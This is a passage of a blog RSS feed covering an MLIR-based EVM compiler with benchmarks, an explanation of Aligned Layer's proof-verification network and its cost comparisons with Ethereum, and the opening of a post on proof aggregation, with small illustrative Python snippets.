&lt;p&gt;The EVM is a stack-based virtual machine whose compiled bytecode represents a sequence of instructions consisting of 1-byte opcodes with implicit parameters. Push operations also include up to 32 bytes of extra data (the number to push to the stack).&lt;&#x2F;p&gt;
&lt;p&gt;Its memory architecture consists of five components:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Stack: stores up to 1024 256-bit wide integers. Each operation pops operands from it, and&#x2F;or pushes results to it. If a program runs out of stack it terminates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Memory: byte array, which allows random addressing by byte. Used for storing and accessing volatile data in an ordered manner.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Calldata: a read-only byte array similar to the _Memory_ sent as input on each transaction. Some operands allow copying data from the calldata to the stack or memory.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Storage: dictionary with 256-bit keys and values. Changes are persisted, unless the transaction is reverted.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Transient storage: similar to _Storage_ , but changes are discarded at the end of a transaction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can see that the execution model of the EVM is exceedingly simple, on purpose.&lt;&#x2F;p&gt;
&lt;p&gt;A naive interpreter loop over the instruction sequence is simple to implement but difficult to optimize. There are many approaches to implementing bytecode interpreters (it’s a fun and educational project!), but removing interpreter overhead by directly translating each opcode to machine instructions is very efficient. The only difficulty is needing a compiler backend and a way to link and invoke the generated code.&lt;&#x2F;p&gt;
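&lt;p&gt;To make the interpreter-overhead point concrete, here is a minimal toy dispatch loop for a handful of EVM opcodes (an illustrative Python sketch, not EVM-MLIR code; the opcode values STOP, ADD, MUL and PUSH1 are the standard EVM ones):&lt;&#x2F;p&gt;

```python
# Minimal toy interpreter for a few EVM opcodes, illustrating the
# dispatch loop that compilation to native code eliminates.
STOP, ADD, MUL, PUSH1 = 0x00, 0x01, 0x02, 0x60
U256 = 2**256  # EVM words are 256-bit integers

def interpret(bytecode):
    stack, pc = [], 0
    while pc < len(bytecode):
        op = bytecode[pc]
        if op == STOP:
            break
        elif op == PUSH1:           # one byte of immediate data
            stack.append(bytecode[pc + 1])
            pc += 1
        elif op == ADD:
            stack.append((stack.pop() + stack.pop()) % U256)
        elif op == MUL:
            stack.append((stack.pop() * stack.pop()) % U256)
        pc += 1
    return stack

# PUSH1 2, PUSH1 3, ADD, PUSH1 5, MUL, STOP  ->  (2 + 3) * 5 = 25
assert interpret(bytes([0x60, 2, 0x60, 3, 0x01, 0x60, 5, 0x02, 0x00])) == [25]
```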
&lt;p&gt;We decided to take advantage of our recent experience with MLIR and write a library to translate each operation to a sequence of MLIR blocks containing the MLIR operations that implement each opcode’s behaviour, stringing them together by connecting each one to the next. Finally, this representation can be translated to LLVM IR and put through LLVM’s optimizer passes.&lt;&#x2F;p&gt;
&lt;p&gt;Not only did we have to translate each opcode’s logic in terms of MLIR operations, we also needed to translate the memory architecture:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Stack: we pre-allocate the max stack size (1024 elements) before starting the aforementioned sequence. Current and base pointers are used to maintain the stack and check for overflows or underflows.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Memory: we handle the memory allocation in Rust, extended as needed by FFI callbacks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Calldata: we store it on Rust&amp;#39;s side, and give it as input to the EVM.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Storage&#x2F;Transient storage: will be handled via syscalls, with an API similar to _revm_.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;benchmarks&quot;&gt;Benchmarks&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;factorial&quot;&gt;Factorial&lt;&#x2F;h4&gt;
&lt;p&gt;This program computed the factorial of N, with N passed via calldata. We chose 1000 as N and ran the program in a loop 100,000 times.&lt;&#x2F;p&gt;
&lt;h5 id=&quot;macbook-air-m1-16-gb-ram&quot;&gt;MacBook Air M1 (16 GB RAM)&lt;&#x2F;h5&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;&#x2F;th&gt;&lt;th&gt;Mean [s]&lt;&#x2F;th&gt;&lt;th&gt;Min [s]&lt;&#x2F;th&gt;&lt;th&gt;Max [s]&lt;&#x2F;th&gt;&lt;th&gt;Relative&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;EVM-MLIR&lt;&#x2F;td&gt;&lt;td&gt;1.062 ± 0.004&lt;&#x2F;td&gt;&lt;td&gt;1.057&lt;&#x2F;td&gt;&lt;td&gt;1.070&lt;&#x2F;td&gt;&lt;td&gt;1.00&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;revm&lt;&#x2F;td&gt;&lt;td&gt;6.747 ± 0.190&lt;&#x2F;td&gt;&lt;td&gt;6.497&lt;&#x2F;td&gt;&lt;td&gt;7.002&lt;&#x2F;td&gt;&lt;td&gt;6.36 ± 0.18&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h5 id=&quot;amd-ryzen-9-5950x-16-core-processor-128-gb-ram&quot;&gt;AMD Ryzen 9 5950X 16-Core Processor (128 GB RAM)&lt;&#x2F;h5&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;&#x2F;th&gt;&lt;th&gt;Mean [s]&lt;&#x2F;th&gt;&lt;th&gt;Min [s]&lt;&#x2F;th&gt;&lt;th&gt;Max [s]&lt;&#x2F;th&gt;&lt;th&gt;Relative&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;EVM-MLIR&lt;&#x2F;td&gt;&lt;td&gt;1.363 ± 0.151&lt;&#x2F;td&gt;&lt;td&gt;1.268&lt;&#x2F;td&gt;&lt;td&gt;1.691&lt;&#x2F;td&gt;&lt;td&gt;1.00&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;revm&lt;&#x2F;td&gt;&lt;td&gt;5.081 ± 0.685&lt;&#x2F;td&gt;&lt;td&gt;4.839&lt;&#x2F;td&gt;&lt;td&gt;7.025&lt;&#x2F;td&gt;&lt;td&gt;3.73 ± 0.65&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h4 id=&quot;fibonacci&quot;&gt;Fibonacci&lt;&#x2F;h4&gt;
&lt;p&gt;This program computed the Nth Fibonacci number, with N passed via calldata. Again, we chose 1000 as N and ran the program in a loop 100,000 times.&lt;&#x2F;p&gt;
&lt;h5 id=&quot;macbook-air-m1-16-gb-ram-1&quot;&gt;MacBook Air M1 (16 GB RAM)&lt;&#x2F;h5&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;&#x2F;th&gt;&lt;th&gt;Mean [s]&lt;&#x2F;th&gt;&lt;th&gt;Min [s]&lt;&#x2F;th&gt;&lt;th&gt;Max [s]&lt;&#x2F;th&gt;&lt;th&gt;Relative&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;EVM-MLIR&lt;&#x2F;td&gt;&lt;td&gt;1.010 ± 0.016&lt;&#x2F;td&gt;&lt;td&gt;0.990&lt;&#x2F;td&gt;&lt;td&gt;1.040&lt;&#x2F;td&gt;&lt;td&gt;1.00&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;revm&lt;&#x2F;td&gt;&lt;td&gt;6.192 ± 0.119&lt;&#x2F;td&gt;&lt;td&gt;6.094&lt;&#x2F;td&gt;&lt;td&gt;6.374&lt;&#x2F;td&gt;&lt;td&gt;6.13 ± 0.15&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h5 id=&quot;amd-ryzen-9-5950x-16-core-processor-128-gb-ram-1&quot;&gt;AMD Ryzen 9 5950X 16-Core Processor (128 GB RAM)&lt;&#x2F;h5&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;&#x2F;th&gt;&lt;th&gt;Mean [s]&lt;&#x2F;th&gt;&lt;th&gt;Min [s]&lt;&#x2F;th&gt;&lt;th&gt;Max [s]&lt;&#x2F;th&gt;&lt;th&gt;Relative&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;EVM-MLIR&lt;&#x2F;td&gt;&lt;td&gt;1.496 ± 0.236&lt;&#x2F;td&gt;&lt;td&gt;1.243&lt;&#x2F;td&gt;&lt;td&gt;1.756&lt;&#x2F;td&gt;&lt;td&gt;1.00&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;revm&lt;&#x2F;td&gt;&lt;td&gt;4.586 ± 0.066&lt;&#x2F;td&gt;&lt;td&gt;4.537&lt;&#x2F;td&gt;&lt;td&gt;4.727&lt;&#x2F;td&gt;&lt;td&gt;3.07 ± 0.49&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Code for these benchmarks can be seen in our repo: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;evm_mlir&quot;&gt;lambdaclass&#x2F;evm_mlir&lt;&#x2F;a&gt;, along with documentation on how to reproduce them. We’re currently running them on our CI to detect performance regressions, and we’ll be adding more complex programs in the near future.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;next-steps&quot;&gt;Next steps&lt;&#x2F;h3&gt;
&lt;p&gt;We are now leaving a skeleton crew to finish the remaining functionality and continue optimizations, while we focus on our new Execution Client, nicknamed &lt;em&gt;ethrex&lt;&#x2F;em&gt; after ETHereum Rust EXecution.&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned, our objective for our new Execution Client is to give the Ethereum ecosystem an alternative Rust Execution client with simple, straightforward code in the coming two months. After the MLIR EVM is ready, we intend to integrate it into &lt;em&gt;ethrex&lt;&#x2F;em&gt;, as part of a dog-fooding effort.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Aligned Layer: First Aligned Testnet in EigenLayer</title>
          <pubDate>Fri, 03 May 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/aligned-layer-first-aligned-testnet-in-eigenlayer/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/aligned-layer-first-aligned-testnet-in-eigenlayer/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/aligned-layer-first-aligned-testnet-in-eigenlayer/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge and validity proofs have gained attention due to their capabilities in decentralized private computation, scaling blockchains, identity protocols, and verifiable machine learning, among others. They allow one party, the prover, to show to other parties, the verifiers, that a given statement is true in a time- and memory-efficient way. Zero-knowledge proofs allow us to prove the statement without revealing anything other than its validity. They are becoming one of the main building blocks in web3. However, even though the technology has been around since the mid-1980s, it was not at the heart of Bitcoin and Ethereum due to the lack of efficient constructions for such applications. This lack leads to restrictions in the types of proof systems we can verify, introduces overhead in verification time and costs in Ethereum, and also increases development and go-to-market times, since we have to optimize the verification contracts to reduce gas usage (and, therefore, costs). &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;whitepaper.alignedlayer.com&#x2F;&quot;&gt;Aligned Layer&lt;&#x2F;a&gt;, powered by EigenLayer, provides a decentralized network of verifiers that can check proofs from any proof system in a fast and cost-effective way.&lt;&#x2F;p&gt;
&lt;p&gt;With the introduction of zk-rollups and identity protocols, the demand for on-chain verification of zero-knowledge proofs has increased dramatically. These verifications compete for blockspace with other applications in Ethereum, such as DeFi and NFTs, leading to increasing costs. Luckily, there are ways of reducing on-chain verification, at the expense of time overhead, and a low marginal off-chain cost. Aligned Layer offers a solution without introducing time overhead, and lets developers choose whether they want to wait for the proof to be verified on Ethereum before proceeding further.&lt;&#x2F;p&gt;
&lt;p&gt;This post will explain what succinct, non-interactive arguments of knowledge are, how proofs are verified in Ethereum, strategies to reduce costs, what Aligned Layer can offer to Ethereum, and how it differs from aggregation layers, given its capacity to verify several orders of magnitude more proofs than Ethereum.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;succinct-non-interactive-arguments-of-knowledge-snarks&quot;&gt;Succinct, Non-Interactive Arguments of Knowledge (SNARKs)&lt;&#x2F;h2&gt;
&lt;p&gt;Succinct, non-interactive arguments of knowledge (SNARKs) allow us to prove the validity of a statement in a way that is much faster than it would take to check it naïvely. For example, say we wanted to show that we computed the 1,073,741,824th Fibonacci number correctly. The simplest way anyone could check the calculation is by recomputing the whole sequence, $a_0 = 1$, $a_1 = 1$, $a_2 = 2$, $a_3 = 3$, $a_{n + 2} = a_{n + 1} + a_n$, which is reexecuting the computation we did. This is how blockchains solved the issue of agreement between different parties: reexecution and consensus. However, this proves computationally intensive and it is problematic if we want to check computations we cannot check by ourselves due to limited computing power. SNARKs achieve sublinear verification (typically, logarithmic time verification), which means that we need to perform less work. It also means that we do not need to know all the steps in the computation (more precisely, we do not need the whole witness). Using STARKs, proof sizes and verification times are in the order of $\log^2 n$, where $n$ is the length of the program. In the case of our Fibonacci, $n = 2^{30}$, so proof sizes and times would be some constants times $30^2 = 900$, which is way smaller than $2^{30}$. So, instead of reexecution, we verify proofs, saving huge amounts of time and memory.&lt;&#x2F;p&gt;
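&lt;p&gt;The gap between re-execution and succinct verification can be checked with back-of-the-envelope arithmetic (constants omitted):&lt;&#x2F;p&gt;

```python
import math

# Naive verification re-executes all n steps; STARK proof size and
# verification time scale like log^2(n) (up to constants).
n = 2**30  # the 1,073,741,824th Fibonacci number
naive_steps = n
stark_scale = int(math.log2(n)) ** 2  # 30^2 = 900

assert stark_scale == 900
# The gap between re-execution and succinct verification:
assert naive_steps // stark_scale > 1_000_000
```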
&lt;p&gt;There are different SNARK constructions, based on either linear probabilistically checkable proofs (PCPs), such as Groth 16, or interactive oracle proofs (IOPs), such as Plonk or STARKs, using different cryptographic assumptions and commitment schemes (collision-resistant hash functions, hardness of the discrete log problem, knowledge of exponent), presence or absence of trusted ceremonies, arithmetization schemes, multivariate or univariate polynomials, etc. This results in a wide variety of SNARKs, with different trade-offs in proof size, verification time, prover time, and the types of applications they are suited for. Initially, constructing SNARKs involved expressing computations as circuits, a developer-intensive task requiring expert knowledge and prone to errors and bugs. With the advent of general-purpose zkvms this task has been greatly simplified, allowing developers to write their programs in a higher-level language, such as Rust, and prove them without having to write the circuits themselves.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;verification-in-ethereum&quot;&gt;Verification in Ethereum&lt;&#x2F;h2&gt;
&lt;p&gt;We have several options to prove computations, depending on our needs. However, not all proof systems are easy or cheap to verify in Ethereum, due to two factors: storage and gas costs associated with running the verification algorithm. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;a16zcrypto.com&#x2F;posts&#x2F;article&#x2F;measuring-snark-performance-frontends-backends-and-the-future&#x2F;&quot;&gt;For example&lt;&#x2F;a&gt;, the cost of verifying a STARK is around 5,000,000 gas, while Plonk-based proofs are below 1,000,000 gas. Thanks to precompiles, SNARKs based on pairings (such as Groth 16 and proof systems using the KZG commitment scheme) tend to be less expensive, since the pairing operation costs around 200,000 gas and elliptic curve operations on the BN254 curve, such as addition and scalar multiplication, are rather cheap.&lt;&#x2F;p&gt;
&lt;p&gt;There are several limitations to the proof systems we can verify directly in Ethereum. For example, inner-product-argument-based proof systems such as Mina’s Kimchi (which has efficient recursion via Pickles) or Brakedown-based ones such as Binius (with square-root-sized proofs) become very expensive to verify, either because of the number of operations they involve or because of proof size.&lt;&#x2F;p&gt;
&lt;p&gt;In order to verify these proofs, we need to wrap them using a more cost effective solution for Ethereum, such as KZG Kimchi for Mina. However, this comes at the expense of simulating costly operations such as foreign field arithmetic and lots of elliptic curve operations, taking a lot of effort in terms of development and go-to-market time. Besides, if you invent a new proof system which is very efficient but not EVM-friendly, you need to spend a lot of time developing the wrapper to make it cheap to verify in the EVM.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;amortizing-costs&quot;&gt;Amortizing costs&lt;&#x2F;h2&gt;
&lt;p&gt;The best ways to reduce costs in Ethereum are related to shrinking proof and public input size (thus reducing storage) and proving large computations instead of shorter ones (for example, verifying a proof for all the transactions in one block is way less expensive than verifying each transaction separately). The first strategy involves using constant-proof-size SNARKs, such as Groth 16 or Plonk, and providing a commitment to the public input, instead of the whole public input. The second one involves bundling several computations into one, such as all the transactions in one block. This idea was used in Starknet, proving the execution of the bootloader program in the Cairo-vm. However, many proof systems have greater memory use when proving larger computations, limiting the size of the computations we can prove using this approach. To deal with these issues, we can use recursive proof composition to aggregate several proofs into one; thus, the cost of verification in Ethereum will be split between the different computations we checked.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;batch-verification&quot;&gt;Batch verification&lt;&#x2F;h2&gt;
&lt;p&gt;Some schemes allow for batch verification: by doing some extra operations, we can check several proofs together, splitting most of the cost between the proofs. For example, if we have several evaluation proofs from a KZG commitment scheme, we can check them together by sampling random scalars, instead of verifying each separately. Even though one KZG verification can be expensive (it involves one pairing operation), by batching several proofs together, the cost per proof becomes negligible. BLS signatures exploit this property, too. Even though the BLS signatures are more expensive to check than ECDSA signatures, with batch verification we can make overall verification costs much smaller.&lt;&#x2F;p&gt;
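&lt;p&gt;The random-linear-combination idea behind batch verification can be sketched without pairings (a toy model over a prime field; real KZG batching applies the same idea to pairing checks):&lt;&#x2F;p&gt;

```python
import random

# Toy batch verification via a random linear combination over a prime field.
# Checking sum(r_i * (a_i * b_i - c_i)) == 0 for random r_i catches a false
# claim with overwhelming probability (a Schwartz-Zippel style argument).
p = 2**31 - 1

claims = [(3, 4, 12), (5, 6, 30), (7, 8, 56)]  # claims of the form "a * b == c"

def batch_verify(claims):
    rs = [random.randrange(1, p) for _ in claims]
    acc = sum(r * (a * b - c) for r, (a, b, c) in zip(rs, claims)) % p
    return acc == 0

assert batch_verify(claims)                     # all claims true
assert not batch_verify([(3, 4, 13)] + claims)  # one false claim: caught
```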
&lt;h2 id=&quot;aggregation&quot;&gt;Aggregation&lt;&#x2F;h2&gt;
&lt;p&gt;Proof aggregation is usually carried out by recursive verification, using an n-ary tree structure (one common case is a binary tree, taking 2 proofs and producing a proof of the correctness of the verification of the two proofs). However, this is not the only technique available. For an overview of some techniques, see our &lt;a href=&quot;&#x2F;proof-aggregation-techniques&#x2F;&quot;&gt;previous blog post&lt;&#x2F;a&gt;. Proof recursion is a good technique for aggregation, but it usually involves expensive operations. For example, it may involve non-native arithmetic (the proof we want to verify is over some finite field, but the verification’s proof is over a different field), performing expensive elliptic curve operations such as pairings or calculating many hashes (in hash-based systems, such as STARKs).&lt;&#x2F;p&gt;
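&lt;p&gt;The tree structure can be pictured with hashes standing in for recursive proofs (a toy sketch; a real aggregator replaces each hash with a proof that both children were verified):&lt;&#x2F;p&gt;

```python
import hashlib

# Toy binary aggregation tree: combine "proofs" pairwise until one root
# remains. Hashes stand in for recursive verification proofs.
def combine(left, right):
    return hashlib.sha256(left + right).digest()

def aggregate(proofs):
    layer = list(proofs)
    while len(layer) > 1:
        layer = [combine(layer[i], layer[i + 1]) for i in range(0, len(layer), 2)]
    return layer[0]

proofs = [hashlib.sha256(bytes([i])).digest() for i in range(8)]
root = aggregate(proofs)  # 8 proofs -> 4 -> 2 -> 1
assert len(root) == 32
```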
&lt;p&gt;Some projects focus on reducing costs by providing proof aggregation, either as a service or as part of their protocol (for example, rollups). However, proof aggregation is limited to a few proof systems and incurs some overhead. Since these projects want to achieve cheap verification in Ethereum, they end up wrapping their proofs into an EVM-friendly proof.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;looking-for-speed&quot;&gt;Looking for speed?&lt;&#x2F;h2&gt;
&lt;p&gt;The main drawbacks of proof aggregation are the overhead associated with the aggregation and the need for several proofs to bundle together. This means that we have an increase in latency (which could make some applications infeasible) and that some applications may have trouble scaling (for example, you are just starting a new protocol that is not widely used yet, or you offer a very valuable service that does not yet have many users).&lt;&#x2F;p&gt;
&lt;p&gt;Aligned Layer offers fast and cheap verification, which is different from proof aggregation. Aligned Layer can be faster than Ethereum because of the following reasons:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Aligned Layer does not run the verification on top of the EVM. It just runs the code natively in CPUs or even in GPUs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Aligned Layer can leverage parallelization, which is something Ethereum cannot.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The EVM cannot process operations exceeding 30,000,000 gas per block, even if there is unused computing capacity.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Ethereum verifiers are optimized for gas usage, whereas verification in Aligned Layer can be optimized for speed. Use of faster finite field arithmetic, more efficient elliptic curve operations, or faster hashing will result in higher throughput than Ethereum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Aligned Layer can use other DA layers to further reduce storage costs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Aligned Layer can verify proof systems that are not feasible in Ethereum, either because their proof size is large or the operations involved are expensive in Ethereum (such as Kimchi or Binius).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Since verification costs in Aligned Layer are smaller than in Ethereum, the demand for ZK verification is very likely to increase due to lower entry costs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To see the potential advantages of Aligned Layer for verification over Ethereum, we will do some rough estimates of performance. The numbers are summarized in the following table:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Proof System&lt;&#x2F;th&gt;&lt;th&gt;Groth 16&lt;&#x2F;th&gt;&lt;th&gt;STARKs&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Gas cost Ethereum&lt;&#x2F;td&gt;&lt;td&gt;220,000&lt;&#x2F;td&gt;&lt;td&gt;5,000,000&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Proofs per block in Ethereum&lt;&#x2F;td&gt;&lt;td&gt;136&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Verification time, consumer-end hardware (ms)&lt;&#x2F;td&gt;&lt;td&gt;1-3&lt;&#x2F;td&gt;&lt;td&gt;&amp;lt;25&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Proofs per block time&lt;&#x2F;td&gt;&lt;td&gt;4000&lt;&#x2F;td&gt;&lt;td&gt;480&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Improvement over Ethereum&lt;&#x2F;td&gt;&lt;td&gt;29x&lt;&#x2F;td&gt;&lt;td&gt;80x&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;A Groth16 proof costs between 220,000 gas and 300,000 gas; using the full capacity of Ethereum, this amounts to at most 136 verifications every 12 seconds. Verification of the same proofs in consumer grade hardware, without parallelization, takes between 1 and 3 ms, leading to at least 4,000 Groth16 proofs over the same period of time, nearly 30 times more proofs. For STARK proofs, which cost around 5,000,000 gas, it is just 6 proofs per block. STARK verification over CPUs depend on program size, but could be below 25 ms, leading to at least 480 proofs, an 80x improvement. The numbers of Ethereum represent its maximum nominal capacity and will not improve unless the gas limit is increased or proof gas use is further reduced (however, there are other applications running on Ethereum, which compete for this limited verification capacity). Aligned Layer can use more powerful devices, optimize code for speed and leverage a high degree of parallelization. Moreover, since Aligned Layer only verifies proofs, its computing power is not shared with other applications.&lt;&#x2F;p&gt;
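&lt;p&gt;The figures in the table follow from simple arithmetic on the block gas limit and block time; a sketch reproducing the estimates:&lt;&#x2F;p&gt;

```python
# Reproducing the rough estimates: proofs per 12-second Ethereum block
# (30,000,000 gas limit) vs. native verification on consumer hardware.
GAS_LIMIT, BLOCK_TIME_MS = 30_000_000, 12_000

groth16_onchain = GAS_LIMIT // 220_000       # 136 proofs per block
stark_onchain = GAS_LIMIT // 5_000_000       # 6 proofs per block
groth16_native = BLOCK_TIME_MS // 3          # 4,000 proofs at 3 ms each
stark_native = BLOCK_TIME_MS // 25           # 480 proofs at 25 ms each

assert groth16_onchain == 136 and stark_onchain == 6
assert groth16_native == 4000 and stark_native == 480
assert groth16_native // groth16_onchain == 29   # ~29x improvement
assert stark_native // stark_onchain == 80       # 80x improvement
```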
&lt;h2 id=&quot;advantages-of-having-a-fast-and-a-slow-mode&quot;&gt;Advantages of having a fast and a slow mode&lt;&#x2F;h2&gt;
&lt;p&gt;Aligned Layer offers the best of both worlds with its fast and slow modes. Aligned Layer’s goal is to verify any proof system quickly and new proof systems can be incorporated easily. After getting Aligned Layer’s verification, which is backed by a subset of Ethereum’s validators, developers can use the result to move forward. It is also cheaper since it is not constrained by the EVM. Besides, if you develop a new proof system, you just need to provide the verifier code in Rust and have no need to code a wrapper, reducing development time.&lt;&#x2F;p&gt;
&lt;p&gt;Having cheap verification makes it easier for protocols and applications to adopt zero-knowledge proofs, reducing the barrier to entry. Besides, it helps scale zero-knowledge proofs: since the number of proofs per unit time increases, it becomes easier to gather a reasonable number of proofs to aggregate and check in Ethereum, leading to a reduction in the verification cost per proof. The slow mode adds additional security since the final verification is done in Ethereum. Moreover, if the validators misbehaved in the fast mode, the slow mode will override any results they provided and lead to slashing.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;There has been a growing demand for zero-knowledge proofs due to their applications in decentralized private computing, blockchain scalability, verifiable machine learning, and identity protocols. The demand for on-chain verification in Ethereum has grown, but single-proof verification costs remain high and compete with other applications. Proof aggregation reduces costs by bundling several proofs into one, at the expense of higher latency and a small marginal off-chain cost, which is expected to go down as prover technology improves. However, the overhead introduced and the need for a sufficiently large number of proofs limit the types of applications that can effectively leverage zero-knowledge proofs, due to latency requirements or scale. Aligned Layer provides a decentralized network of verifiers, backed by the trust of Ethereum via EigenLayer, offering fast, low-latency, and low-cost verification of proofs. It is different from aggregation layers, since its main goal is to verify proofs and allow developers to choose the best proof system for their needs. Aggregation works by bundling proofs and dividing the fixed cost of verification between the proofs, but developers must wait until settlement in Ethereum. In Aligned Layer, it is up to developers to choose whether they prefer the fast or the slow mode. We think Aligned Layer will accelerate the adoption of zero-knowledge proofs in applications and, together with EigenLayer, will help bring further innovation to Ethereum.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Proof aggregation techniques</title>
          <pubDate>Mon, 25 Mar 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-techniques/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-techniques/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-techniques/">&lt;h1 id=&quot;proof-aggregation-techniques&quot;&gt;Proof aggregation techniques&lt;&#x2F;h1&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
